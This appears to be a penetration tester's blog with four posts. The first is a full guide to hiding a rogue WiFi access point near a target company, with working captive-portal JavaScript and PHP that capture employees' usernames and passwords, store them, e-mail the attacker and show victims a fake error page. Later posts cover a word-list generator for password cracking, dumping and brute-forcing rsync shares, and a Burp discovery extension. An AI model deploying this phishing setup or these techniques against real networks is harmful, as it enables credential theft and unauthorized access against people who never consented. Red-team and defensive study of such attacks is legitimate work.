Monday, March 27, 2017

Captive Portal WiFi Phishing with OpenWrt

As companies and organizations become more aware of security risks and implement proper protections, it can be difficult for pentesters and red teams to gain access to a network. Social engineering is a great way to accomplish that initial entry. Unfortunately, when phishing e-mails or calls aren't working and you don't want to be too aggressive in your tactics, you need another method. What if we create an access point (AP) in the company's vicinity and redirect any users who connect (hopefully employees of our target company) to a customized captive portal splash page to steal credentials? It would be similar to what you might find when connecting to a hotel wireless AP. In this attack we are depending on employees' desire to use their company or personal devices on an unmonitored "guest" wireless network, separate from the company's main AP.

There are many tools that conduct wireless attacks, such as Wifiphisher; however, these typically perform aggressive attacks such as forcing a man-in-the-middle connection. Setting up a captive portal is a more passive approach. Something like a captive portal can be done with the WiFi Pineapple, but I wanted to create my own for customization, cost savings, and fun.

For this project I wanted something small and portable which can be hidden in or around a company's physical location. I chose the TP-Link TL-MR3020 router which ranges from $30-$50. For storage and concealment purposes I used a SanDisk Cruzer Fit 8GB USB flash drive which can be bought for as little as $7. Optionally, a portable battery pack can be used to power the router, and those are fairly inexpensive as well. To connect my router to the internet during an attack I am using a Verizon MiFi; however, you could also use a nearby public AP.

The router is meant to be a client of the MiFi while broadcasting its own AP, which redirects users to the captive portal where credentials can be stolen or malware can be introduced. Once we get a positive hit, the router can use its internet connection to contact us remotely. A diagram of the attack would look something like this:

The following is a step-by-step guide of my process. Skip to step 7 for the good stuff!

Step 1: Flash default router firmware

The TP-Link router's web interface is accessible at its default gateway address with the credentials admin:admin. For more detailed information regarding the router's default configuration, consult the router's user guide. Now flash the default firmware with the factory OpenWrt Barrier Breaker 14.07 firmware: openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin. Note: no other version of OpenWrt has enough space to install the packages required to use the flash drive and expand the storage. After flashing OpenWrt you should be able to access the web interface at the router's LAN address. If you are having issues connecting, try disabling other network adapters not being used to communicate with the router.

You may want to change the router's IP address while you are setting everything up if it conflicts with other devices on your network. Go to Network > Interfaces > (br-lan) Edit > change the IPv4 address > Save & Apply. After the settings are saved you will probably need to request a new DHCP lease to be able to reconnect to the router at its new address.

Step 2: Connect router to internet

To connect the TP-Link TL-MR3020 router to the internet it must be a client of another internet-connected router first. To do this go to Network > Wifi > Scan > Join Network > WPA Passphrase (if applicable) > Submit. By default the mode should be “Client”. Submit these changes for the MR3020 to become a client of your home router. At this point you can confirm you have internet access by updating the package list or pinging a public host via SSH.

Step 3: Expand memory

The TP-Link TL-MR3020 router comes with very little storage, which makes installing the packages I wanted impossible. Fortunately, with a cheap flash drive I can expand that storage. I followed an ExtRoot guide for this; however, when I tried installing the packages via the command opkg install block-mount kmod-usb-storage kmod-fs-ext4, I received errors.

To fix these errors, replace the /etc/opkg.conf file (via WinSCP or similar) with the following feed list, then run opkg update via SSH (each src/gz entry should point at the corresponding OpenWrt Barrier Breaker 14.07 repository URL, omitted here):
src/gz barrier_breaker_packages
src/gz barrier_breaker_base
src/gz barrier_breaker_luci
src/gz barrier_breaker_management
src/gz barrier_breaker_routing
src/gz barrier_breaker_telephony
src/gz barrier_breaker_oldpackages
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
Now the command opkg install block-mount kmod-usb-storage kmod-fs-ext4 should install the packages correctly. Just as ediy mentions, you can ignore a couple of kmod errors. Reboot the router via the web interface or SSH. Partition the flash drive and insert it into the router. In an SSH session, type block info to get the device name of the flash drive (e.g. /dev/sda1).
Now the following commands can be used to copy rootfs to the flash drive:
mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1
mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot/ -cvf - . | tar -C /mnt/sda1/ -xf -
umount /tmp/cproot/
If /etc/config/fstab does not exist on the router, generate it by typing block detect > /etc/config/fstab via SSH, then edit the file (via WinSCP or similar) so that the /dev/sda1 mount is enabled and targeted at the root filesystem:
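A typical ExtRoot fstab for this setup looks something like the sketch below; the device name, filesystem, and mount options may differ on your system:

```
config 'mount'
        option  target          '/'
        option  device          '/dev/sda1'
        option  fstype          'ext4'
        option  options         'rw,sync'
        option  enabled         '1'
        option  enabled_fsck    '0'
```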
Now reboot the router and verify the increased amount of space using df -h.

Step 4: Create access point

To create an access point to broadcast to potential victims, go to Network > Wifi > Add and create a new wireless interface in Access Point mode. Make sure the lan checkbox is checked. Select Wireless Security if you want to configure authentication. Save & Apply these settings. Your TP-Link TL-MR3020 is now both a client of your home router, which it will use for internet, and its own broadcasting access point.
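For reference, the resulting entry in /etc/config/wireless should look roughly like this sketch (the SSID and radio name are illustrative; an open network is the most enticing to victims):

```
config wifi-iface
        option device     'radio0'
        option network    'lan'
        option mode       'ap'
        option ssid       'Guest WiFi'
        option encryption 'none'
```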

Step 5: Install NoDogSplash

To install NoDogSplash I used the web interface by going to System > Software > Filter “nodogsplash” > Find package > Install. If you can’t find the nodogsplash package, be sure to update your package lists first (System > Software > Update lists, or opkg update via SSH).
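Once installed, NoDogSplash is configured in /etc/nodogsplash/nodogsplash.conf. At minimum the gateway interface should match the AP's bridge; the values below are illustrative:

```
# Interface NoDogSplash listens on (the bridge our AP belongs to)
GatewayInterface br-lan
# Name displayed on the splash page
GatewayName Guest WiFi
MaxClients 50
```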

Step 6: Install PHP

The ability to install various packages such as PHP was one of the main reasons why I initially expanded the amount of storage I had. Installing PHP is optional depending on what functionality you want and how you implement it. Since the NoDogSplash server does not support PHP, this setup lets me use PHP with the default OpenWrt uHTTPd server without installing a separate web server. Installing PHP is easy via SSH with the opkg install php5 php5-cgi command. If this doesn’t work, make sure you have the line src/gz barrier_breaker_oldpackages in your /etc/opkg.conf file and update the package list. Finally, in the /etc/config/uhttpd file add the line list interpreter '.php=/usr/bin/php-cgi' to the 'main' section.
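With the interpreter line in place, the 'main' section of /etc/config/uhttpd looks roughly like the following (other options left at their defaults; the listen address is illustrative):

```
config uhttpd 'main'
        list listen_http        ''
        option home             '/www'
        list interpreter        '.php=/usr/bin/php-cgi'
```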

Step 7: Configure splash page and capture credentials

This is the fun part where we can get creative! We want to create a splash page which is specific to our target environment in an attempt to trick users into submitting their credentials to us. We could also attempt to execute malicious JavaScript or serve a malicious file such as an executable, browser extension, or PDF. For now we will just capture user input such as local or network credentials which we can use to gain a foothold in the network or for use in other attacks.
Creating a realistic splash page targeted towards a company or organization can be accomplished with a simple mix of JavaScript, HTML, and CSS. Most companies will have specific logos, public images, color schemes, fonts, and more which can be used to create a realistic splash page. Here is an example of a simple splash page with a login form:

To capture any submitted credentials I use the following code for the login form (snippet):
<script type="text/javascript">
 function submitTextToCapture() {
      username = document.getElementById("username").value;
      password = document.getElementById("password").value;
      // capture.php is served by uHTTPd on port 80; replace <router-ip> with the router's address
      window.location = "http://<router-ip>/capture.php?username=" + username + "&password=" + password;
 }
</script>
<form class="login-form">
 <input type="text" id="username" placeholder="username"/>
 <input type="password" id="password" placeholder="password"/>
 <button type="button" id="button" onclick="submitTextToCapture()">Continue</button>
</form>
This splash page is served from the NoDogSplash server (/etc/nodogsplash/htdocs/) using port 2050. After a user enters their credentials and submits them, window.location redirects the user to capture.php, which is served from the default OpenWrt uHTTPd server (/www/) on port 80. Sending the credentials to our capture.php page now gives us the ability to use PHP to perform the actions we want. As an example, I want to store credentials on the router and send myself an e-mail alert after credentials have been captured. To write to a local file I use the PHP fwrite function:
$username = $_GET["username"];
$password = $_GET["password"];
$redir = "";

$file = fopen("stored.txt", "a");
fwrite($file, "Username: " . $username . "\n" . "Password: " . $password . "\n\n");
fclose($file);
To send an e-mail alert install msmtp on the router by running the command opkg install msmtp. Once installed, edit the /etc/msmtprc configuration file to include mail host information:
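An /etc/msmtprc for a typical SMTP provider looks something like the following; the host, credentials, and addresses are placeholders:

```
defaults
auth           on
tls            on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile        /tmp/msmtp.log

account        alert
host           smtp.example.com
port           587
from           alerts@example.com
user           alerts@example.com
password       yourpassword

account default : alert
```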
The php.ini file must then be edited to include the line sendmail_path = "/usr/bin/msmtp -C /path/to/your/config -t", where the config path is usually /etc/msmtprc. I then included the following code in my capture.php file to send an e-mail alert with some information about the client and redirect them to a fake error page:
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];

$msg = "Credentials have been captured!\n\nIP: {$ip}\nBrowser: {$browser}\nReferrer: {$referrer}";

mail("","*Captured Credentials*",$msg);

echo '<script type="text/javascript">window.location = "' . $redir . '"</script>';
The final result is an e-mail alert and the credentials being stored to a local file on the router:
Lastly, we can redirect the user to an error page stating the WiFi service is unavailable for some reason to reduce suspicions since we never intended on actually providing internet access. The goal of this attack is to be passive and inconspicuous.
All done! In the future I may post various ways to deliver other realistic payloads such as a malicious executable or browser extension.

Resources: a similar captive portal project for the WiFi Pineapple, which I found after completing this one.

Thursday, March 23, 2017

SmeegeScrape: Text Scraper and Custom Word List Generator

Click Here to Download Source Code

Customize your security testing with SmeegeScrape.py! It's a simple Python script to scrape text from various sources, including local files and web pages, and turn the text into a custom word list. A customized word list has many uses, from web application testing to password cracking; having a specific set of words to use against a target can increase efficiency and effectiveness during a penetration test. I realize there are other text scrapers publicly available; however, I feel this script is simple, efficient, and specific enough to warrant its own release. It can read almost any file containing cleartext that Python can open. I have also included support for file formats such as pdf, html, docx, and pptx.


Usage: SmeegeScrape.py {-f file | -d directory | -u web_url | -l url_list_file} [-o output_filename] [-s] [-i] [-min #] [-max #]

One of the following input types is required:(-f filename), (-d directory), (-u web_url), (-l url_list_file)

-h, --help show this help message and exit
-f LOCALFILE, --localFile LOCALFILE Specify a local file to scrape
-d DIRECTORY, --fileDirectory DIRECTORY Specify a directory to scrape the inside files
-u URL, --webUrl URL Specify a url to scrape page content (correct format: http(s)://
-l URL_LIST_FILE, --webList URL_LIST_FILE Specify a text file with a list of URLs to scrape (separated by newline)
-o FILENAME, --outputFile FILENAME Specify output filename (default: smeegescrape_out.txt)
-i, --integers Remove integers [0-9] from all output
-s, --specials Remove special characters from all output
-min # Specify the minimum length for all words in output
-max # Specify the maximum length for all words in output

Scraping a local file: SmeegeScrape.py -f Test-File.txt
This is a sample text file with different text.
This file could be different filetypes including html, pdf, powerpoint, docx, etc.  
Anything which can be read in as cleartext can be scraped.
I hope you enjoy SmeegeScrape, feel free to comment if you like it!


Each word is separated by a newline. The options -i and -s can be used to remove any integers or special characters found. Also, the -min and -max arguments can be used to specify desired word length.
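As a side note, the same length filtering can be reproduced after the fact with standard shell tools. This is not part of SmeegeScrape, just a quick way to post-process an existing word list; the filenames below are examples:

```shell
# Sample word list, one word per line (the format SmeegeScrape outputs)
printf 'This\nis\na\nsample\ntext\nfile\nwith\ndifferent\ncleartext\n' > words.txt

# Keep only words of length 5-12 and drop duplicates,
# mirroring the -min 5 -max 12 options
awk 'length($0) >= 5 && length($0) <= 12' words.txt | sort -u > filtered.txt
cat filtered.txt
```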

Scraping a web page: SmeegeScrape.py -u <web_url> -si

To scrape web pages we use the Python urllib2 module. The format of the URL is checked via regex, and it must begin with http:// or https://.

[Screenshot: web scrape output]

Scraping multiple files from a directory: SmeegeScrape.py -d test\ -si -min 5 -max 12

The screen output shows each file which was scraped, the total number of unique words found based on the user's desired options, and the output filename.

[Screenshot: directory scrape output]

Scraping multiple URLs: SmeegeScrape.py -l weblist.txt -si -min 6 -max 10

The -l option takes in a list of web urls from a text file and scrapes each url. Each scraped URL is displayed on the screen as well as a total number of words scraped.

[Screenshots: URL list scraping]

This weblist option is excellent to use with Burp Suite to scrape an entire site. To do this, proxy your web traffic through Burp and discover as much content on the target site as you can (spidering, manual discovery, dictionary attack on directories/files, etc.). After the discovery phase, right click on the target in the site map and select the option "Copy URLs in this host" from the drop down list. In this instance, even for a small blog like mine, over 300 URLs were copied. Depending on the size of the site the scraping could take a little while, so be patient!

[Screenshot: Burp "Copy URLs in this host" option]

Now just paste the URLs into a text file and run that as input with the -l option: SmeegeScrape.py -l SmeegeScrape-Burp-URLs.txt -si -min 6 -max 12
[Screenshot: final output after parsing]

Just like that, we scraped an entire site for words with the specific attributes (length and character set) that we want.

As you can see there are many different possibilities with this script. I tried to make it as accurate as possible however sometimes the script depends on modules such as nltk, docx, etc. which may not always work correctly. In situations like this where the script is unable to read a certain file format, I would suggest trying to convert it to a more readable file type or copy/paste the text to a text file which can always be scraped.

The custom word list dictionaries you create are up to your imagination, so have fun with it! This script could also be easily modified to extract phrases or sentences, which could be used for cracking passphrases. Here are a couple of examples I made:

Holy Bible, King James Version of 1611: SmeegeScrape.py -f HolyBibleDocx.docx -si -min 6 -max 12 -o HolyBible_scraped.txt

Shakespeare's Romeo and Juliet: SmeegeScrape.py -u <web_url> -si -min 6 -max 12 -o romeo_juliet_scraped.txt

Feel free to share your scraped lists or ideas on useful content to scrape. Comments and suggestions welcome, enjoy!

Thursday, December 15, 2016

Pentesting Rsync

"Pentesting rsync" is what I googled when I first saw it reported as an open service by Nessus. I hadn't seen it much, and most available documentation about it was just a short usage manual. Rsync (Remote Sync) is an open source utility that provides fast incremental file transfer. Rsync copies files either to or from a remote host, or locally on the current host. It is commonly found on *nix systems and functions as both a file synchronization and file transfer program.

According to the rsync documentation, there are two different ways for rsync to contact a remote system: using a remote-shell program as the transport (such as ssh or rsh) or contacting an rsync daemon directly via TCP. The remote-shell transport is used whenever the source or destination path contains a single colon (:) separator after a host specification. Contacting an rsync daemon directly happens when the source or destination path contains a double colon (::) separator after a host specification, OR when an rsync:// URL is specified.

So how do we detect rsync and take advantage of it during a pentest? During a recent test, one of the Nessus results was plugin 11389, “rsync service detection.” Furthermore, each of the hosts in the “Hosts” section had a list of rsync modules with their name, description, and access rights.

The default port you will typically find an rsync daemon running on is 873, and potentially 8873. If you aren’t using Nessus, a simple nmap scan of those ports will let you know if either is open. Once you have determined an rsync service is running, you can use the Metasploit module auxiliary/scanner/rsync/modules_list, which lists the names of the modules the same way the Nessus plugin did.

Alternatively you can also use the nmap script rsync-list-modules to get a list of rsync modules.

nmap --script=rsync-list-modules <ip> -p 873

Once you have the list of modules you have a few different options depending on the actions you want to take and whether or not authentication is required. If authentication is not required you can copy all files to your local machine via the following command:

rsync -av rsync://<ip>/module_name_1 /data/tmp

This recursively transfers all files from the module “module_name_1” on the remote machine into the /data/tmp directory on the local machine. The files are transferred in "archive" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer. Happy dumpster diving!

But… what if authentication is required? Some modules on the remote daemon may require authentication. If so, you will receive a password prompt when you connect. As a pentester you still have options! There is an NSE script called rsync-brute which performs brute-force password auditing against the rsync remote file syncing protocol.
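For context, whether a module prompts for a password is controlled by its definition in rsyncd.conf on the server side; a module defined like the sketch below (names and paths are illustrative) would require authentication, while one without auth users would not:

```
[module_name_1]
        path = /srv/module_name_1
        comment = Backup share
        read only = yes
        list = yes
        auth users = backupuser
        secrets file = /etc/rsyncd.secrets
```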


Tuesday, February 2, 2016

Burp Suite Extension: Burp Importer

Burp Importer is a Burp Suite extension written in Python which allows users to connect to a list of web servers and populate the sitemap with successful connections. Burp Importer also has the ability to parse Nessus (.nessus), Nmap (.gnmap), or text files for potential web connections. Have you ever wished you could use Burp’s Intruder to hit multiple targets at once for discovery purposes? Now you can with the Burp Importer extension. Use cases for this extension include web server discovery, authorization testing, and more!

Click here to download source code


  1. Download the Jython standalone JAR.
  2. In the Extender>Options tab point your Python Environment to the Jython file.
  3. Add Burp Importer in the Extender>Extensions tab.

General Use

Burp Importer is easy to use as it’s fairly similar to Burp’s Intruder tool. The first section of the extension is the file load option, which is optional and used to parse Nessus (.nessus), Nmap (.gnmap), or a list of newline-separated URLs (.txt). Nessus files are parsed for the HTTP Information plugin (ID 24260). Nmap files are parsed for open common web ports from a predefined dictionary. Text files should be a list of URLs, one per line, in a valid URL format. After the files are parsed, a list of generated URLs will be added to the URL List box.

The URL List section is almost identical to Burp Intruder’s Payload Options. Users have the ability to paste a list of URLs, copy the current list, remove a URL from the list, clear the entire list, or add an individual URL. A connection to each item in the list will be attempted using Burp's makeHttpRequest method.

Gnmap file parsed example:

Nessus file parsed example:

The last section of the extension provides the user a checkbox option to follow redirects, run the list of URLs, and a run log. Redirects are determined by 301 and 302 status codes and based on the ‘Location’ header in the response. The run log displays the same output which shows in the Extender>Extensions>Output tab. It shows basic data any time you run the URL list such as successful connections, number of redirects (if enabled), and a list of URLs which are malformed or have connectivity issues.

Running a list of hosts:

Items imported into the sitemap:

Use Case – Discovery

One of the main motivations for creating this extension was to help the discovery phase of an application or network penetration test. Parsing through network or vulnerability scan results can be tedious and inefficient which is why automation is a vital part of penetration testing. This extension can be utilized as just a file parser which generates valid URLs to use with other tools and can also be used to gain quick insight into the web application scope of a network. There are many ways to utilize this tool from a discovery perspective, which include:

  • Determine the web scope of an environment via successful connections added to the sitemap.
  • Search or scrape for certain information from multiple sites. An example of this would be searching multiple sites for e-mail addresses or other specific information.
  • Determine the low-level vulnerability posture of multiple sites or pages via spidering then passive or active scanning.

Use Case – Authorization Testing

Another way to use this extension is to check an application for insecure direct object references. This refers to restricting objects or pages only to users who are authorized. To do this requires at least one set of valid credentials or potentially more depending on how many user roles are being tested. Also, session handling rules must be set to use cookies from Burp’s cookie jar with Extender.

The following steps can then be performed:

  1. Authenticate with the highest privileged account and spider/discover as many objects and pages as possible. Don’t forget to use intruder to search for hidden directories as well as convert POST requests to GET which can also be used to access additional resources (if allowed by the server of course).
  2. In the sitemap right click on the host at the correct path and select ‘Copy URLs in this branch.’ This will give you a list of resources which were accessed by the high privileged account.
  3. Logout and clear any saved session information.
  4. Login with a lower privileged user which could also be a user with no credentials or user role at all. Be sure you have an active session with this user.
  5. Open the Burp Importer tab and paste the list of resources retrieved from the higher privileged account into the URL List box. Select the ‘Enable: Follow Redirects’ box as it helps you know if you are being redirected to a login or error page.
  6. Analyze the results! A list of ‘failed’ connections and the number of redirects will automatically be added to the Log box. These are a good indicator if the lower privileged session was able to access the resources or if they were just redirected to a login/error page. The sitemap should also be searched to manually verify if any unauthorized resources were indeed successfully accessed. Entire branches of responses can be searched using regex and a negative match for the ‘Location’ header to find valid connections.
Here we can see the requests made to the DVWA application while logged in as 'admin' were not able to connect, and were redirected to the login page after the original administrative session was logged out and killed. In this use case, the DVWA application was not vulnerable to insecure direct object references.

There are many other uses for this extension just use your imagination! If you come up with any cool ideas or have any comments please reach out to me.